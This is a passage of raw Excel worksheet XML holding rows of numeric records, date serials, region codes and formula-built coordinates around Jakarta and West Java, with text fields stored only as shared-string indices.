        <v>-6.26718,106.92193</v>
      </c>
    </row>
    <row r="3258" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3258">
        <v>259192</v>
      </c>
      <c r="B3258" s="1">
        <v>44247</v>
      </c>
      <c r="C3258" s="2">
        <v>5.4699074074074074E-2</v>
      </c>
      <c r="D3258" t="s">
        <v>22</v>
      </c>
      <c r="E3258" t="s">
        <v>23</v>
      </c>
      <c r="F3258" t="s">
        <v>10891</v>
      </c>
      <c r="H3258" t="s">
        <v>7978</v>
      </c>
      <c r="I3258" t="s">
        <v>7983</v>
      </c>
      <c r="J3258" t="s">
        <v>2608</v>
      </c>
      <c r="L3258" t="s">
        <v>10892</v>
      </c>
      <c r="M3258">
        <v>3322130002</v>
      </c>
      <c r="N3258">
        <v>3322130</v>
      </c>
      <c r="O3258">
        <v>3322</v>
      </c>
      <c r="P3258">
        <v>33</v>
      </c>
      <c r="Q3258" t="s">
        <v>10893</v>
      </c>
      <c r="R3258" t="s">
        <v>10894</v>
      </c>
      <c r="S3258" t="s">
        <v>1334</v>
      </c>
      <c r="T3258" t="s">
        <v>1134</v>
      </c>
      <c r="U3258" s="5">
        <v>11044570</v>
      </c>
      <c r="V3258" s="5" t="s">
        <v>17383</v>
      </c>
      <c r="W3258" s="5">
        <v>-718493</v>
      </c>
      <c r="X3258" t="s">
        <v>21120</v>
      </c>
      <c r="Y3258" t="str">
        <f t="shared" si="50"/>
        <v>-7.18493,110.44570</v>
      </c>
    </row>
    <row r="3259" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3259">
        <v>259193</v>
      </c>
      <c r="B3259" s="1">
        <v>44247</v>
      </c>
      <c r="C3259" s="2">
        <v>5.5358796296296288E-2</v>
      </c>
      <c r="D3259" t="s">
        <v>22</v>
      </c>
      <c r="E3259" t="s">
        <v>23</v>
      </c>
      <c r="F3259" t="s">
        <v>10895</v>
      </c>
      <c r="G3259" t="s">
        <v>10896</v>
      </c>
      <c r="H3259" t="s">
        <v>26</v>
      </c>
      <c r="I3259" t="s">
        <v>3668</v>
      </c>
      <c r="J3259" t="s">
        <v>2627</v>
      </c>
      <c r="L3259" t="s">
        <v>10897</v>
      </c>
      <c r="M3259">
        <v>3216061005</v>
      </c>
      <c r="N3259">
        <v>3216061</v>
      </c>
      <c r="O3259">
        <v>3216</v>
      </c>
      <c r="P3259">
        <v>32</v>
      </c>
      <c r="Q3259" t="s">
        <v>10898</v>
      </c>
      <c r="R3259" t="s">
        <v>55</v>
      </c>
      <c r="S3259" t="s">
        <v>41</v>
      </c>
      <c r="T3259" t="s">
        <v>42</v>
      </c>
      <c r="U3259" s="5">
        <v>10716913</v>
      </c>
      <c r="V3259" s="5" t="s">
        <v>17384</v>
      </c>
      <c r="W3259" s="5">
        <v>-628471</v>
      </c>
      <c r="X3259" t="s">
        <v>21121</v>
      </c>
      <c r="Y3259" t="str">
        <f t="shared" si="50"/>
        <v>-6.28471,107.16913</v>
      </c>
    </row>
    <row r="3260" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3260">
        <v>259218</v>
      </c>
      <c r="B3260" s="1">
        <v>44247</v>
      </c>
      <c r="C3260" s="2">
        <v>5.7777777777777782E-2</v>
      </c>
      <c r="D3260" t="s">
        <v>22</v>
      </c>
      <c r="E3260" t="s">
        <v>23</v>
      </c>
      <c r="F3260" t="s">
        <v>10899</v>
      </c>
      <c r="G3260" t="s">
        <v>10900</v>
      </c>
      <c r="H3260" t="s">
        <v>26</v>
      </c>
      <c r="I3260" t="s">
        <v>332</v>
      </c>
      <c r="J3260" t="s">
        <v>10901</v>
      </c>
      <c r="L3260" t="s">
        <v>10902</v>
      </c>
      <c r="M3260">
        <v>3175010002</v>
      </c>
      <c r="N3260">
        <v>3175010</v>
      </c>
      <c r="O3260">
        <v>3175</v>
      </c>
      <c r="P3260">
        <v>31</v>
      </c>
      <c r="Q3260" t="s">
        <v>616</v>
      </c>
      <c r="R3260" t="s">
        <v>546</v>
      </c>
      <c r="S3260" t="s">
        <v>547</v>
      </c>
      <c r="T3260" t="s">
        <v>33</v>
      </c>
      <c r="U3260" s="5">
        <v>10677557</v>
      </c>
      <c r="V3260" s="5" t="s">
        <v>17385</v>
      </c>
      <c r="W3260" s="5">
        <v>-613654</v>
      </c>
      <c r="X3260" t="s">
        <v>21122</v>
      </c>
      <c r="Y3260" t="str">
        <f t="shared" si="50"/>
        <v>-6.13654,106.77557</v>
      </c>
    </row>
    <row r="3261" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3261">
        <v>259243</v>
      </c>
      <c r="B3261" s="1">
        <v>44247</v>
      </c>
      <c r="C3261" s="2">
        <v>6.1608796296296293E-2</v>
      </c>
      <c r="D3261" t="s">
        <v>22</v>
      </c>
      <c r="E3261" t="s">
        <v>23</v>
      </c>
      <c r="F3261" t="s">
        <v>10903</v>
      </c>
      <c r="G3261" t="s">
        <v>10904</v>
      </c>
      <c r="H3261" t="s">
        <v>26</v>
      </c>
      <c r="I3261" t="s">
        <v>10905</v>
      </c>
      <c r="J3261" t="s">
        <v>160</v>
      </c>
      <c r="L3261" t="s">
        <v>10906</v>
      </c>
      <c r="M3261">
        <v>3171040001</v>
      </c>
      <c r="N3261">
        <v>3171040</v>
      </c>
      <c r="O3261">
        <v>3171</v>
      </c>
      <c r="P3261">
        <v>31</v>
      </c>
      <c r="Q3261" t="s">
        <v>162</v>
      </c>
      <c r="R3261" t="s">
        <v>163</v>
      </c>
      <c r="S3261" t="s">
        <v>108</v>
      </c>
      <c r="T3261" t="s">
        <v>33</v>
      </c>
      <c r="U3261" s="5">
        <v>10677137</v>
      </c>
      <c r="V3261" s="5" t="s">
        <v>17386</v>
      </c>
      <c r="W3261" s="5">
        <v>-626109</v>
      </c>
      <c r="X3261" t="s">
        <v>21123</v>
      </c>
      <c r="Y3261" t="str">
        <f t="shared" si="50"/>
        <v>-6.26109,106.77137</v>
      </c>
    </row>
    <row r="3262" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3262">
        <v>259244</v>
      </c>
      <c r="B3262" s="1">
        <v>44247</v>
      </c>
      <c r="C3262" s="2">
        <v>6.2175925925925933E-2</v>
      </c>
      <c r="D3262" t="s">
        <v>22</v>
      </c>
      <c r="E3262" t="s">
        <v>23</v>
      </c>
      <c r="F3262" t="s">
        <v>10907</v>
      </c>
      <c r="H3262" t="s">
        <v>26</v>
      </c>
      <c r="I3262" t="s">
        <v>166</v>
      </c>
      <c r="J3262" t="s">
        <v>3135</v>
      </c>
      <c r="L3262" t="s">
        <v>10908</v>
      </c>
      <c r="M3262">
        <v>3671042003</v>
      </c>
      <c r="N3262">
        <v>3671042</v>
      </c>
      <c r="O3262">
        <v>3671</v>
      </c>
      <c r="P3262">
        <v>36</v>
      </c>
      <c r="Q3262" t="s">
        <v>10909</v>
      </c>
      <c r="R3262" t="s">
        <v>2102</v>
      </c>
      <c r="S3262" t="s">
        <v>201</v>
      </c>
      <c r="T3262" t="s">
        <v>171</v>
      </c>
      <c r="U3262" s="5">
        <v>10659974</v>
      </c>
      <c r="V3262" s="5" t="s">
        <v>17387</v>
      </c>
      <c r="W3262" s="5">
        <v>-618425</v>
      </c>
      <c r="X3262" t="s">
        <v>21124</v>
      </c>
      <c r="Y3262" t="str">
        <f t="shared" si="50"/>
        <v>-6.18425,106.59974</v>
      </c>
    </row>
    <row r="3263" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3263">
        <v>259269</v>
      </c>
      <c r="B3263" s="1">
        <v>44247</v>
      </c>
      <c r="C3263" s="2">
        <v>6.4351851851851841E-2</v>
      </c>
      <c r="D3263" t="s">
        <v>22</v>
      </c>
      <c r="E3263" t="s">
        <v>23</v>
      </c>
      <c r="F3263" t="s">
        <v>10910</v>
      </c>
      <c r="G3263" t="s">
        <v>10911</v>
      </c>
      <c r="H3263" t="s">
        <v>26</v>
      </c>
      <c r="I3263" t="s">
        <v>1559</v>
      </c>
      <c r="J3263" t="s">
        <v>793</v>
      </c>
      <c r="L3263" t="s">
        <v>7899</v>
      </c>
      <c r="M3263">
        <v>3175010002</v>
      </c>
      <c r="N3263">
        <v>3175010</v>
      </c>
      <c r="O3263">
        <v>3175</v>
      </c>
      <c r="P3263">
        <v>31</v>
      </c>
      <c r="Q3263" t="s">
        <v>616</v>
      </c>
      <c r="R3263" t="s">
        <v>546</v>
      </c>
      <c r="S3263" t="s">
        <v>547</v>
      </c>
      <c r="T3263" t="s">
        <v>33</v>
      </c>
      <c r="U3263" s="5">
        <v>10677507</v>
      </c>
      <c r="V3263" s="5" t="s">
        <v>17388</v>
      </c>
      <c r="W3263" s="5">
        <v>-613876</v>
      </c>
      <c r="X3263" t="s">
        <v>21125</v>
      </c>
      <c r="Y3263" t="str">
        <f t="shared" si="50"/>
        <v>-6.13876,106.77507</v>
      </c>
    </row>
    <row r="3264" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3264">
        <v>259270</v>
      </c>
      <c r="B3264" s="1">
        <v>44247</v>
      </c>
      <c r="C3264" s="2">
        <v>6.4826388888888892E-2</v>
      </c>
      <c r="D3264" t="s">
        <v>22</v>
      </c>
      <c r="E3264" t="s">
        <v>23</v>
      </c>
      <c r="F3264" t="s">
        <v>10912</v>
      </c>
      <c r="H3264" t="s">
        <v>26</v>
      </c>
      <c r="I3264" t="s">
        <v>2016</v>
      </c>
      <c r="J3264" t="s">
        <v>10913</v>
      </c>
      <c r="L3264" t="s">
        <v>10914</v>
      </c>
      <c r="M3264">
        <v>3174070001</v>
      </c>
      <c r="N3264">
        <v>3174070</v>
      </c>
      <c r="O3264">
        <v>3174</v>
      </c>
      <c r="P3264">
        <v>31</v>
      </c>
      <c r="Q3264" t="s">
        <v>83</v>
      </c>
      <c r="R3264" t="s">
        <v>84</v>
      </c>
      <c r="S3264" t="s">
        <v>32</v>
      </c>
      <c r="T3264" t="s">
        <v>33</v>
      </c>
      <c r="U3264" s="5">
        <v>10672534</v>
      </c>
      <c r="V3264" s="5" t="s">
        <v>17389</v>
      </c>
      <c r="W3264" s="5">
        <v>-615709</v>
      </c>
      <c r="X3264" t="s">
        <v>21126</v>
      </c>
      <c r="Y3264" t="str">
        <f t="shared" si="50"/>
        <v>-6.15709,106.72534</v>
      </c>
    </row>
    <row r="3265" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3265">
        <v>259296</v>
      </c>
      <c r="B3265" s="1">
        <v>44247</v>
      </c>
      <c r="C3265" s="2">
        <v>6.9305555555555551E-2</v>
      </c>
      <c r="D3265" t="s">
        <v>22</v>
      </c>
      <c r="E3265" t="s">
        <v>23</v>
      </c>
      <c r="F3265" t="s">
        <v>10915</v>
      </c>
      <c r="G3265" t="s">
        <v>10916</v>
      </c>
      <c r="H3265" t="s">
        <v>26</v>
      </c>
      <c r="I3265" t="s">
        <v>5687</v>
      </c>
      <c r="J3265" t="s">
        <v>10917</v>
      </c>
      <c r="L3265" t="s">
        <v>10918</v>
      </c>
      <c r="M3265">
        <v>3171040005</v>
      </c>
      <c r="N3265">
        <v>3171040</v>
      </c>
      <c r="O3265">
        <v>3171</v>
      </c>
      <c r="P3265">
        <v>31</v>
      </c>
      <c r="Q3265" t="s">
        <v>1283</v>
      </c>
      <c r="R3265" t="s">
        <v>163</v>
      </c>
      <c r="S3265" t="s">
        <v>108</v>
      </c>
      <c r="T3265" t="s">
        <v>33</v>
      </c>
      <c r="U3265" s="5">
        <v>10675922</v>
      </c>
      <c r="V3265" s="5" t="s">
        <v>17320</v>
      </c>
      <c r="W3265" s="5">
        <v>-623280</v>
      </c>
      <c r="X3265" t="s">
        <v>18900</v>
      </c>
      <c r="Y3265" t="str">
        <f t="shared" si="50"/>
        <v>-6.23280,106.75922</v>
      </c>
    </row>
    <row r="3266" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3266">
        <v>259297</v>
      </c>
      <c r="B3266" s="1">
        <v>44247</v>
      </c>
      <c r="C3266" s="2">
        <v>7.0462962962962963E-2</v>
      </c>
      <c r="D3266" t="s">
        <v>22</v>
      </c>
      <c r="E3266" t="s">
        <v>23</v>
      </c>
      <c r="F3266" t="s">
        <v>10919</v>
      </c>
      <c r="G3266" t="s">
        <v>10920</v>
      </c>
      <c r="H3266" t="s">
        <v>26</v>
      </c>
      <c r="I3266" t="s">
        <v>1046</v>
      </c>
      <c r="J3266" t="s">
        <v>10616</v>
      </c>
      <c r="M3266">
        <v>3171020002</v>
      </c>
      <c r="N3266">
        <v>3171020</v>
      </c>
      <c r="O3266">
        <v>3171</v>
      </c>
      <c r="P3266">
        <v>31</v>
      </c>
      <c r="Q3266" t="s">
        <v>1172</v>
      </c>
      <c r="R3266" t="s">
        <v>484</v>
      </c>
      <c r="S3266" t="s">
        <v>108</v>
      </c>
      <c r="T3266" t="s">
        <v>33</v>
      </c>
      <c r="U3266" s="5">
        <v>10682258</v>
      </c>
      <c r="V3266" s="5" t="s">
        <v>17390</v>
      </c>
      <c r="W3266" s="5">
        <v>-628857</v>
      </c>
      <c r="X3266" t="s">
        <v>21127</v>
      </c>
      <c r="Y3266" t="str">
        <f t="shared" si="50"/>
        <v>-6.28857,106.82258</v>
      </c>
    </row>
    <row r="3267" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3267">
        <v>259298</v>
      </c>
      <c r="B3267" s="1">
        <v>44247</v>
      </c>
      <c r="C3267" s="2">
        <v>7.0729166666666662E-2</v>
      </c>
      <c r="D3267" t="s">
        <v>22</v>
      </c>
      <c r="E3267" t="s">
        <v>23</v>
      </c>
      <c r="F3267" t="s">
        <v>10921</v>
      </c>
      <c r="G3267" t="s">
        <v>10922</v>
      </c>
      <c r="H3267" t="s">
        <v>26</v>
      </c>
      <c r="I3267" t="s">
        <v>1005</v>
      </c>
      <c r="J3267" t="s">
        <v>2627</v>
      </c>
      <c r="L3267" t="s">
        <v>10923</v>
      </c>
      <c r="M3267">
        <v>3216061005</v>
      </c>
      <c r="N3267">
        <v>3216061</v>
      </c>
      <c r="O3267">
        <v>3216</v>
      </c>
      <c r="P3267">
        <v>32</v>
      </c>
      <c r="Q3267" t="s">
        <v>10898</v>
      </c>
      <c r="R3267" t="s">
        <v>55</v>
      </c>
      <c r="S3267" t="s">
        <v>41</v>
      </c>
      <c r="T3267" t="s">
        <v>42</v>
      </c>
      <c r="U3267" s="5">
        <v>10716766</v>
      </c>
      <c r="V3267" s="5" t="s">
        <v>17391</v>
      </c>
      <c r="W3267" s="5">
        <v>-628252</v>
      </c>
      <c r="X3267" t="s">
        <v>21128</v>
      </c>
      <c r="Y3267" t="str">
        <f t="shared" ref="Y3267:Y3330" si="51">CONCATENATE(X3267,",",V3267)</f>
        <v>-6.28252,107.16766</v>
      </c>
    </row>
    <row r="3268" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3268">
        <v>259299</v>
      </c>
      <c r="B3268" s="1">
        <v>44247</v>
      </c>
      <c r="C3268" s="2">
        <v>7.1342592592592582E-2</v>
      </c>
      <c r="D3268" t="s">
        <v>22</v>
      </c>
      <c r="E3268" t="s">
        <v>23</v>
      </c>
      <c r="F3268" t="s">
        <v>10924</v>
      </c>
      <c r="H3268" t="s">
        <v>26</v>
      </c>
      <c r="I3268" t="s">
        <v>193</v>
      </c>
      <c r="J3268" t="s">
        <v>3135</v>
      </c>
      <c r="L3268" t="s">
        <v>10925</v>
      </c>
      <c r="M3268">
        <v>3671011008</v>
      </c>
      <c r="N3268">
        <v>3671011</v>
      </c>
      <c r="O3268">
        <v>3671</v>
      </c>
      <c r="P3268">
        <v>36</v>
      </c>
      <c r="Q3268" t="s">
        <v>700</v>
      </c>
      <c r="R3268" t="s">
        <v>701</v>
      </c>
      <c r="S3268" t="s">
        <v>201</v>
      </c>
      <c r="T3268" t="s">
        <v>171</v>
      </c>
      <c r="U3268" s="5">
        <v>10673074</v>
      </c>
      <c r="V3268" s="5" t="s">
        <v>17392</v>
      </c>
      <c r="W3268" s="5">
        <v>-623462</v>
      </c>
      <c r="X3268" t="s">
        <v>21129</v>
      </c>
      <c r="Y3268" t="str">
        <f t="shared" si="51"/>
        <v>-6.23462,106.73074</v>
      </c>
    </row>
    <row r="3269" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3269">
        <v>259300</v>
      </c>
      <c r="B3269" s="1">
        <v>44247</v>
      </c>
      <c r="C3269" s="2">
        <v>7.2465277777777781E-2</v>
      </c>
      <c r="D3269" t="s">
        <v>22</v>
      </c>
      <c r="E3269" t="s">
        <v>23</v>
      </c>
      <c r="F3269" t="s">
        <v>10926</v>
      </c>
      <c r="H3269" t="s">
        <v>26</v>
      </c>
      <c r="I3269" t="s">
        <v>1201</v>
      </c>
      <c r="J3269" t="s">
        <v>9767</v>
      </c>
      <c r="L3269" t="s">
        <v>10927</v>
      </c>
      <c r="M3269">
        <v>3174070002</v>
      </c>
      <c r="N3269">
        <v>3174070</v>
      </c>
      <c r="O3269">
        <v>3174</v>
      </c>
      <c r="P3269">
        <v>31</v>
      </c>
      <c r="Q3269" t="s">
        <v>621</v>
      </c>
      <c r="R3269" t="s">
        <v>84</v>
      </c>
      <c r="S3269" t="s">
        <v>32</v>
      </c>
      <c r="T3269" t="s">
        <v>33</v>
      </c>
      <c r="U3269" s="5">
        <v>10673088</v>
      </c>
      <c r="V3269" s="5" t="s">
        <v>17393</v>
      </c>
      <c r="W3269" s="5">
        <v>-615718</v>
      </c>
      <c r="X3269" t="s">
        <v>21130</v>
      </c>
      <c r="Y3269" t="str">
        <f t="shared" si="51"/>
        <v>-6.15718,106.73088</v>
      </c>
    </row>
    <row r="3270" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3270">
        <v>259302</v>
      </c>
      <c r="B3270" s="1">
        <v>44247</v>
      </c>
      <c r="C3270" s="2">
        <v>6.805555555555555E-2</v>
      </c>
      <c r="D3270" t="s">
        <v>2648</v>
      </c>
      <c r="E3270" t="s">
        <v>23</v>
      </c>
      <c r="G3270" t="s">
        <v>10928</v>
      </c>
      <c r="H3270" t="s">
        <v>26</v>
      </c>
      <c r="I3270" t="s">
        <v>103</v>
      </c>
      <c r="J3270" t="s">
        <v>1233</v>
      </c>
      <c r="L3270" t="s">
        <v>10929</v>
      </c>
      <c r="M3270">
        <v>3171060002</v>
      </c>
      <c r="N3270">
        <v>3171060</v>
      </c>
      <c r="O3270">
        <v>3171</v>
      </c>
      <c r="P3270">
        <v>31</v>
      </c>
      <c r="Q3270" t="s">
        <v>1235</v>
      </c>
      <c r="R3270" t="s">
        <v>1236</v>
      </c>
      <c r="S3270" t="s">
        <v>108</v>
      </c>
      <c r="T3270" t="s">
        <v>33</v>
      </c>
      <c r="U3270" s="5">
        <v>10680816</v>
      </c>
      <c r="V3270" s="5" t="s">
        <v>17394</v>
      </c>
      <c r="W3270" s="5">
        <v>-625892</v>
      </c>
      <c r="X3270" t="s">
        <v>21131</v>
      </c>
      <c r="Y3270" t="str">
        <f t="shared" si="51"/>
        <v>-6.25892,106.80816</v>
      </c>
    </row>
    <row r="3271" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3271">
        <v>259326</v>
      </c>
      <c r="B3271" s="1">
        <v>44247</v>
      </c>
      <c r="C3271" s="2">
        <v>7.2303240740740737E-2</v>
      </c>
      <c r="D3271" t="s">
        <v>22</v>
      </c>
      <c r="E3271" t="s">
        <v>23</v>
      </c>
      <c r="F3271" t="s">
        <v>10930</v>
      </c>
      <c r="G3271" t="s">
        <v>10931</v>
      </c>
      <c r="H3271" t="s">
        <v>26</v>
      </c>
      <c r="I3271" t="s">
        <v>3275</v>
      </c>
      <c r="J3271" t="s">
        <v>4027</v>
      </c>
      <c r="L3271" t="s">
        <v>10932</v>
      </c>
      <c r="M3271">
        <v>3174020007</v>
      </c>
      <c r="N3271">
        <v>3174020</v>
      </c>
      <c r="O3271">
        <v>3174</v>
      </c>
      <c r="P3271">
        <v>31</v>
      </c>
      <c r="Q3271" t="s">
        <v>95</v>
      </c>
      <c r="R3271" t="s">
        <v>31</v>
      </c>
      <c r="S3271" t="s">
        <v>32</v>
      </c>
      <c r="T3271" t="s">
        <v>33</v>
      </c>
      <c r="U3271" s="5">
        <v>10675896</v>
      </c>
      <c r="V3271" s="5" t="s">
        <v>17395</v>
      </c>
      <c r="W3271" s="5">
        <v>-616672</v>
      </c>
      <c r="X3271" t="s">
        <v>21132</v>
      </c>
      <c r="Y3271" t="str">
        <f t="shared" si="51"/>
        <v>-6.16672,106.75896</v>
      </c>
    </row>
    <row r="3272" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3272">
        <v>259352</v>
      </c>
      <c r="B3272" s="1">
        <v>44247</v>
      </c>
      <c r="C3272" s="2">
        <v>7.6053240740740741E-2</v>
      </c>
      <c r="D3272" t="s">
        <v>22</v>
      </c>
      <c r="E3272" t="s">
        <v>23</v>
      </c>
      <c r="F3272" t="s">
        <v>10933</v>
      </c>
      <c r="G3272" t="s">
        <v>10934</v>
      </c>
      <c r="H3272" t="s">
        <v>26</v>
      </c>
      <c r="I3272" t="s">
        <v>974</v>
      </c>
      <c r="J3272" t="s">
        <v>5761</v>
      </c>
      <c r="M3272">
        <v>3174020007</v>
      </c>
      <c r="N3272">
        <v>3174020</v>
      </c>
      <c r="O3272">
        <v>3174</v>
      </c>
      <c r="P3272">
        <v>31</v>
      </c>
      <c r="Q3272" t="s">
        <v>95</v>
      </c>
      <c r="R3272" t="s">
        <v>31</v>
      </c>
      <c r="S3272" t="s">
        <v>32</v>
      </c>
      <c r="T3272" t="s">
        <v>33</v>
      </c>
      <c r="U3272" s="5">
        <v>10675274</v>
      </c>
      <c r="V3272" s="5" t="s">
        <v>17396</v>
      </c>
      <c r="W3272" s="5">
        <v>-617492</v>
      </c>
      <c r="X3272" t="s">
        <v>19685</v>
      </c>
      <c r="Y3272" t="str">
        <f t="shared" si="51"/>
        <v>-6.17492,106.75274</v>
      </c>
    </row>
    <row r="3273" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3273">
        <v>259353</v>
      </c>
      <c r="B3273" s="1">
        <v>44247</v>
      </c>
      <c r="C3273" s="2">
        <v>7.678240740740741E-2</v>
      </c>
      <c r="D3273" t="s">
        <v>22</v>
      </c>
      <c r="E3273" t="s">
        <v>23</v>
      </c>
      <c r="F3273" t="s">
        <v>10935</v>
      </c>
      <c r="G3273" t="s">
        <v>10936</v>
      </c>
      <c r="H3273" t="s">
        <v>26</v>
      </c>
      <c r="I3273" t="s">
        <v>10937</v>
      </c>
      <c r="J3273" t="s">
        <v>2627</v>
      </c>
      <c r="L3273" t="s">
        <v>10938</v>
      </c>
      <c r="M3273">
        <v>3276030011</v>
      </c>
      <c r="N3273">
        <v>3276030</v>
      </c>
      <c r="O3273">
        <v>3276</v>
      </c>
      <c r="P3273">
        <v>32</v>
      </c>
      <c r="Q3273" t="s">
        <v>10939</v>
      </c>
      <c r="R3273" t="s">
        <v>184</v>
      </c>
      <c r="S3273" t="s">
        <v>185</v>
      </c>
      <c r="T3273" t="s">
        <v>42</v>
      </c>
      <c r="U3273" s="5">
        <v>10685817</v>
      </c>
      <c r="V3273" s="5" t="s">
        <v>15132</v>
      </c>
      <c r="W3273" s="5">
        <v>-637718</v>
      </c>
      <c r="X3273" t="s">
        <v>21133</v>
      </c>
      <c r="Y3273" t="str">
        <f t="shared" si="51"/>
        <v>-6.37718,106.85817</v>
      </c>
    </row>
    <row r="3274" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3274">
        <v>259379</v>
      </c>
      <c r="B3274" s="1">
        <v>44247</v>
      </c>
      <c r="C3274" s="2">
        <v>7.9560185185185192E-2</v>
      </c>
      <c r="D3274" t="s">
        <v>22</v>
      </c>
      <c r="E3274" t="s">
        <v>23</v>
      </c>
      <c r="F3274" t="s">
        <v>10940</v>
      </c>
      <c r="H3274" t="s">
        <v>26</v>
      </c>
      <c r="I3274" t="s">
        <v>457</v>
      </c>
      <c r="J3274" t="s">
        <v>10941</v>
      </c>
      <c r="L3274" t="s">
        <v>10942</v>
      </c>
      <c r="M3274">
        <v>3172040003</v>
      </c>
      <c r="N3274">
        <v>3172040</v>
      </c>
      <c r="O3274">
        <v>3172</v>
      </c>
      <c r="P3274">
        <v>31</v>
      </c>
      <c r="Q3274" t="s">
        <v>552</v>
      </c>
      <c r="R3274" t="s">
        <v>281</v>
      </c>
      <c r="S3274" t="s">
        <v>49</v>
      </c>
      <c r="T3274" t="s">
        <v>33</v>
      </c>
      <c r="U3274" s="5">
        <v>10688028</v>
      </c>
      <c r="V3274" s="5" t="s">
        <v>17397</v>
      </c>
      <c r="W3274" s="5">
        <v>-625980</v>
      </c>
      <c r="X3274" t="s">
        <v>21134</v>
      </c>
      <c r="Y3274" t="str">
        <f t="shared" si="51"/>
        <v>-6.25980,106.88028</v>
      </c>
    </row>
    <row r="3275" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3275">
        <v>259388</v>
      </c>
      <c r="B3275" s="1">
        <v>44247</v>
      </c>
      <c r="C3275" s="2">
        <v>7.8472222222222221E-2</v>
      </c>
      <c r="D3275" t="s">
        <v>2648</v>
      </c>
      <c r="E3275" t="s">
        <v>23</v>
      </c>
      <c r="G3275" t="s">
        <v>10943</v>
      </c>
      <c r="H3275" t="s">
        <v>26</v>
      </c>
      <c r="J3275" t="s">
        <v>404</v>
      </c>
      <c r="L3275" t="s">
        <v>10944</v>
      </c>
      <c r="M3275">
        <v>3174020005</v>
      </c>
      <c r="N3275">
        <v>3174020</v>
      </c>
      <c r="O3275">
        <v>3174</v>
      </c>
      <c r="P3275">
        <v>31</v>
      </c>
      <c r="Q3275" t="s">
        <v>30</v>
      </c>
      <c r="R3275" t="s">
        <v>31</v>
      </c>
      <c r="S3275" t="s">
        <v>32</v>
      </c>
      <c r="T3275" t="s">
        <v>33</v>
      </c>
      <c r="U3275" s="5">
        <v>10677080</v>
      </c>
      <c r="V3275" s="5" t="s">
        <v>17040</v>
      </c>
      <c r="W3275" s="5">
        <v>-616648</v>
      </c>
      <c r="X3275" t="s">
        <v>20778</v>
      </c>
      <c r="Y3275" t="str">
        <f t="shared" si="51"/>
        <v>-6.16648,106.77080</v>
      </c>
    </row>
    <row r="3276" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3276">
        <v>259432</v>
      </c>
      <c r="B3276" s="1">
        <v>44247</v>
      </c>
      <c r="C3276" s="2">
        <v>8.4907407407407418E-2</v>
      </c>
      <c r="D3276" t="s">
        <v>22</v>
      </c>
      <c r="E3276" t="s">
        <v>23</v>
      </c>
      <c r="F3276" t="s">
        <v>10945</v>
      </c>
      <c r="H3276" t="s">
        <v>26</v>
      </c>
      <c r="I3276" t="s">
        <v>1046</v>
      </c>
      <c r="J3276" t="s">
        <v>10946</v>
      </c>
      <c r="L3276" t="s">
        <v>10947</v>
      </c>
      <c r="M3276">
        <v>3172050003</v>
      </c>
      <c r="N3276">
        <v>3172050</v>
      </c>
      <c r="O3276">
        <v>3172</v>
      </c>
      <c r="P3276">
        <v>31</v>
      </c>
      <c r="Q3276" t="s">
        <v>2896</v>
      </c>
      <c r="R3276" t="s">
        <v>358</v>
      </c>
      <c r="S3276" t="s">
        <v>49</v>
      </c>
      <c r="T3276" t="s">
        <v>33</v>
      </c>
      <c r="U3276" s="5">
        <v>10686533</v>
      </c>
      <c r="V3276" s="5" t="s">
        <v>17398</v>
      </c>
      <c r="W3276" s="5">
        <v>-628944</v>
      </c>
      <c r="X3276" t="s">
        <v>21135</v>
      </c>
      <c r="Y3276" t="str">
        <f t="shared" si="51"/>
        <v>-6.28944,106.86533</v>
      </c>
    </row>
    <row r="3277" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3277">
        <v>259433</v>
      </c>
      <c r="B3277" s="1">
        <v>44247</v>
      </c>
      <c r="C3277" s="2">
        <v>8.5844907407407411E-2</v>
      </c>
      <c r="D3277" t="s">
        <v>22</v>
      </c>
      <c r="E3277" t="s">
        <v>23</v>
      </c>
      <c r="F3277" t="s">
        <v>10948</v>
      </c>
      <c r="G3277" t="s">
        <v>10949</v>
      </c>
      <c r="H3277" t="s">
        <v>26</v>
      </c>
      <c r="I3277" t="s">
        <v>117</v>
      </c>
      <c r="J3277" t="s">
        <v>3135</v>
      </c>
      <c r="M3277">
        <v>3671011008</v>
      </c>
      <c r="N3277">
        <v>3671011</v>
      </c>
      <c r="O3277">
        <v>3671</v>
      </c>
      <c r="P3277">
        <v>36</v>
      </c>
      <c r="Q3277" t="s">
        <v>700</v>
      </c>
      <c r="R3277" t="s">
        <v>701</v>
      </c>
      <c r="S3277" t="s">
        <v>201</v>
      </c>
      <c r="T3277" t="s">
        <v>171</v>
      </c>
      <c r="U3277" s="5">
        <v>10672783</v>
      </c>
      <c r="V3277" s="5" t="s">
        <v>17399</v>
      </c>
      <c r="W3277" s="5">
        <v>-623247</v>
      </c>
      <c r="X3277" t="s">
        <v>21136</v>
      </c>
      <c r="Y3277" t="str">
        <f t="shared" si="51"/>
        <v>-6.23247,106.72783</v>
      </c>
    </row>
    <row r="3278" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3278">
        <v>259434</v>
      </c>
      <c r="B3278" s="1">
        <v>44247</v>
      </c>
      <c r="C3278" s="2">
        <v>8.6782407407407405E-2</v>
      </c>
      <c r="D3278" t="s">
        <v>22</v>
      </c>
      <c r="E3278" t="s">
        <v>23</v>
      </c>
      <c r="F3278" t="s">
        <v>10950</v>
      </c>
      <c r="G3278" t="s">
        <v>10951</v>
      </c>
      <c r="H3278" t="s">
        <v>26</v>
      </c>
      <c r="I3278" t="s">
        <v>10952</v>
      </c>
      <c r="J3278" t="s">
        <v>2777</v>
      </c>
      <c r="L3278" t="s">
        <v>10953</v>
      </c>
      <c r="M3278">
